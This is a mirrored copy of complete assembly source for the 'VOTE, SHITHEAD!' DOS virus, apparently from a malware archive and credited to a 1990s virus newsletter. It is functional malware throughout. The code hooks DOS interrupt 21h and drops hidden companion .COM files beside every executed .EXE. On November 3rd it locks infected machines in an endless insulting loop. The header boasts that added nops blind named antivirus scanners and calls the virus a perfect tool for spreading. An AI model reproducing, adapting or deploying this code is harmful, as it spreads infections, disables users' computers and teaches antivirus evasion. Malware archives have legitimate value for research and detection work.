mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-30 15:05:27 +00:00
319 lines
11 KiB
NASM
319 lines
11 KiB
NASM
;****************************************************************************
|
||
;* VOTE, SHITHEAD! virus Edited by URNST KOUCH for the Crypt Newsletter 7.
|
||
;*
|
||
;* TASM/MASM compatible source listing
|
||
;*
|
||
;* VOTE, SHITHEAD is a resident, companion virus based upon Little
|
||
;* Brother code and library .asm routines extracted from Nowhere Man's VCL.
|
||
;* It is also 'patched' with three 'nops' (they are commented) which
|
||
;* effectively blind a number of a-v scanners. This simple alteration
|
||
;* demonstrates a practical benefit of source code possession: quick
|
||
;* generation of different virus strains becomes a task within anyone's
|
||
;* reach. The only tools needed are a number of virus scanners and patience.
|
||
;*
|
||
;* In any case, the VOTE virus is just the ideal sample needed for
|
||
;* judicious virus action. It is a PERFECT tool for viral spreading for
|
||
;* a number of reasons. First, it is a FAST infector. Once resident
|
||
;* VOTE will create a companion file for ANY .EXE executed on ANY drive
|
||
;* and it will do it so quickly that most users, even suspicious ones,
|
||
;* will not notice any slowdown or glitches in machine operation.
|
||
;* Second, 'companion-ed' .EXE's will continue to load and function
|
||
;* properly when VOTE is resident. At the start of the day's computing,
|
||
;* the first 'companion-ed' .EXE executed will misfire ONCE as the virus
|
||
;* becomes resident. If it is re-called it will function perfectly.
|
||
;* Third, VOTE like the INSUFF viruses in the last newsletter strikes
|
||
;* directly at anti-virus suites vulnerable to 'spawning' infections (many
|
||
;* no-names, CPAV, NAV) and creates 'hidden' companion files, an improvement
|
||
;* over the original virus's modus operandi which left them out in plane
|
||
;* sight in the directory. Last, VOTE is very small. In RAM, it is not
|
||
;* discernible, taking up slightly less that 0.25k. Characteristically,
|
||
;* this is NOT reported by a mem /c display. In fact,
|
||
;* VOTE is almost invisible to any number of standard diagnostic
|
||
;* tests. Memory maps by QEMM and Norton's SYSINFO will
|
||
;* report INT 21 hooked differently. But unless the user can compare
|
||
;* an uncontaminated INTERRUPT report with one when the virus IS present,
|
||
;* it's unlikely he'll know anything is different. Even then, VOTE is hard
|
||
;* to notice.
|
||
;*
|
||
;* On election day, November 3rd, VOTE will lock an infected machine into
|
||
;* a loop as it displays a "DID YOU VOTE, SHITHEAD??" query repetitively
|
||
;* across the monitor. Computing will be impossible on Nov. 3rd
|
||
;* unless VOTE is removed from the machine, a task accomplished by unmasking
|
||
;* all the hidden .COMfiles and deleting them while
|
||
;* the virus is NOT resident. At all other times, VOTE is almost completely
|
||
;* transparent.
|
||
;****************************************************************************
|
||
|
||
code segment
|
||
assume cs:code,ds:code,es:nothing
|
||
|
||
.RADIX 16
|
||
|
||
|
||
oi21 equ endit
|
||
nameptr equ endit+4
|
||
DTA equ endit+8
|
||
|
||
|
||
;****************************************************************************
|
||
;* Check for activation date, then proceed to installation!
|
||
;****************************************************************************
|
||
|
||
org 100h
|
||
|
||
begin:
|
||
call get_day ; Get the day, DOS time/date grab
|
||
cmp ax,0003h ; Did the function return the 3rd?
|
||
jne realstrt ; If equal, continue along stream
|
||
call get_month ; Get the month, DOS time/date grab
|
||
cmp ax,000Bh ; Did the function return November (11)?
|
||
jne realstrt ; If equal, continue to blooie; if not
|
||
; skip to loading of virus
|
||
|
||
|
||
blooie: mov dx, offset shithead ;load 'shithead' message
|
||
mov ah,9 ;display it and loop
|
||
int 21h ;endlessly until
|
||
jmp blooie ;user becomes ill and reboots
|
||
|
||
realstrt: mov ax,0044h ;move VOTE SHITHEAD to empty hole in RAM
|
||
nop ;a 'nop' to confuse tbSCAN
|
||
mov es,ax
|
||
nop ;a 'nop' to confuse Datatechnik's AVscan
|
||
mov di,0100h
|
||
mov si,di
|
||
mov cx,endit - begin ;length of SHITHEAD into cx
|
||
rep movsb
|
||
|
||
mov ds,cx ;get original int21 vector
|
||
mov si,0084h
|
||
mov di,offset oi21
|
||
mov dx,offset ni21
|
||
lodsw
|
||
cmp ax,dx ;check to see if virus is around
|
||
je cancel ; by comparing new interrupt (ni21)
|
||
stosw ; vector to current, if it looks
|
||
movsw ; the same 'cancel' operation
|
||
|
||
push es ;set vector to new handler
|
||
pop ds
|
||
mov ax,2521h
|
||
int 21h
|
||
|
||
cancel: ret
|
||
|
||
|
||
;****************************************************************************
|
||
;* File-extension masks for checking and naming routines;message text
|
||
;****************************************************************************
|
||
|
||
EXE_txt db 'EXE',0
|
||
COM_txt db 'COM',0
|
||
SHITHEAD db "DID YOU VOTE, SHITHEAD??"
|
||
db 07h,07h,'$'
|
||
|
||
;****************************************************************************
|
||
;* Interrupt handler 24
|
||
;****************************************************************************
|
||
|
||
ni24: mov al,03 ;virus critical error handler
|
||
iret ;prevents embarrassing messages
|
||
;on attempted writes to protected disks
|
||
|
||
;****************************************************************************
|
||
;* Interrupt handler 21
|
||
;****************************************************************************
|
||
|
||
ni21: pushf
|
||
|
||
push es
|
||
push ds
|
||
push ax
|
||
push bx
|
||
push dx
|
||
|
||
cmp ax,4B00h ;now that we're installed
|
||
jne exit ; check for 4B00, DOS excutions
|
||
|
||
doit: call infect ; if one comes by, grab it
|
||
|
||
exit: pop dx ; if anything else, goto sleep
|
||
pop bx
|
||
pop ax
|
||
pop ds
|
||
pop es
|
||
popf
|
||
|
||
jmp dword ptr cs:[oi21] ;call to old int-handler
|
||
|
||
|
||
;****************************************************************************
|
||
;* Try to infect a file (ptr to ASCIIZ-name is DS:DX)
|
||
;****************************************************************************
|
||
|
||
infect: cld
|
||
|
||
mov word ptr cs:[nameptr],dx ;save the ptr to the filename
|
||
mov word ptr cs:[nameptr+2],ds
|
||
|
||
mov ah,2Fh ;get old DTA
|
||
int 21
|
||
push es
|
||
push bx
|
||
|
||
push cs ;set new DTA
|
||
|
||
pop ds
|
||
mov dx,offset DTA
|
||
mov ah,1Ah
|
||
int 21
|
||
|
||
call searchpoint ; here's where we grab a name
|
||
push di ; for ourselves
|
||
mov si,offset COM_txt ;is extension 'COM'?
|
||
|
||
mov cx,3
|
||
rep cmpsb
|
||
pop di
|
||
jz do_com ;if so, go to our .COM routine
|
||
|
||
mov si,offset EXE_txt ;is extension 'EXE'?
|
||
nop ;'nop' to confuse SCAN v95b.
|
||
mov cl,3
|
||
rep cmpsb
|
||
jnz return
|
||
|
||
do_exe: mov si,offset COM_txt ;change extension to COM
|
||
nop ;another 'nop' to confuse SCAN
|
||
call change_ext
|
||
|
||
mov ax,3300h ;get ctrl-break flag
|
||
nop
|
||
int 21
|
||
push dx
|
||
|
||
cwd ;clear the flag
|
||
inc ax
|
||
push ax
|
||
int 21
|
||
|
||
mov ax,3524h ;get int24 vector
|
||
int 21
|
||
push bx
|
||
push es
|
||
|
||
push cs ;set int24 vector to new handler
|
||
pop ds ;virus handles machine
|
||
mov dx,offset ni24 ;exits on attempted writes
|
||
mov ah,25h ;to write-protected disks
|
||
push ax
|
||
int 21
|
||
|
||
lds dx,dword ptr [nameptr] ;create the virus (with name of .EXE target)
|
||
mov ah,03Ch ; DOS create file function
|
||
mov cx,00100111b ; CX holds file attributes (all)
|
||
int 021h ; makes it hidden/system/read-only
|
||
; do it
|
||
xchg bx,ax ;save handle
|
||
|
||
push cs
|
||
pop ds
|
||
mov cx,endit - begin ; write the virus to the created file
|
||
mov dx,offset begin ; CX contains length
|
||
mov ah,40h ; write to file function
|
||
int 21
|
||
|
||
mov ah,3Eh ;close the file
|
||
int 21
|
||
|
||
|
||
return1: pop ax ;restore int24 vector
|
||
pop ds
|
||
pop dx
|
||
int 21
|
||
|
||
pop ax ;restore ctrl-break flag
|
||
pop dx
|
||
int 21
|
||
|
||
mov si,offset EXE_txt ;change extension to EXE
|
||
call change_ext ;execute EXE-file
|
||
|
||
return: mov ah,1Ah ;restore old DTA
|
||
pop dx
|
||
pop ds
|
||
int 21
|
||
|
||
ret
|
||
|
||
do_com: call findfirst ;is the COM-file a virus?
|
||
cmp word ptr cs:[DTA+1Ah],endit - begin ;compare it to virus length
|
||
jne return ;no, so execute COM-file
|
||
mov si,offset EXE_txt ;does the EXE-variant exist?
|
||
call change_ext
|
||
call findfirst
|
||
jnc return ;yes, execute EXE-file
|
||
mov si,offset COM_txt ;change extension to COM
|
||
call change_ext
|
||
jmp short return ;execute COM-file
|
||
|
||
;****************************************************************************
|
||
;* Search beginning of extension for name we will usurp
|
||
;****************************************************************************
|
||
|
||
searchpoint: les di,dword ptr cs:[nameptr]
|
||
mov ch,0FFh
|
||
mov al,0
|
||
repnz scasb
|
||
sub di,4
|
||
ret
|
||
|
||
;****************************************************************************
|
||
;* Change the extension of the filename (CS:SI -> ext)
|
||
;****************************************************************************
|
||
|
||
change_ext: call searchpoint
|
||
push cs
|
||
pop ds
|
||
movsw
|
||
movsw
|
||
ret
|
||
|
||
|
||
|
||
;****************************************************************************
|
||
;* Find the file
|
||
;****************************************************************************
|
||
|
||
findfirst: lds dx,dword ptr [nameptr]
|
||
mov cl,27h
|
||
mov ah,4Eh
|
||
int 21
|
||
ret
|
||
|
||
;****************************************************************************
|
||
;* Get the day off the system for activation checking
|
||
;****************************************************************************
|
||
get_day:
|
||
mov ah,02Ah ; DOS get date function
|
||
int 021h
|
||
mov al,dl ; Copy day into AL
|
||
cbw ; Sign-extend AL into AX
|
||
ret ; Get back to caller
|
||
;*************************************************************************
|
||
;* Get the month off the system for activation checking
|
||
;*************************************************************************
|
||
|
||
get_month:
|
||
mov ah,02Ah ; DOS get date function
|
||
int 021h
|
||
mov al,dh ; Copy month into AL
|
||
cbw ; Sign-extend AL into AX
|
||
ret ; Get back to caller
|
||
|
||
|
||
endit:
|
||
|
||
code ends
|
||
end begin
|
||
|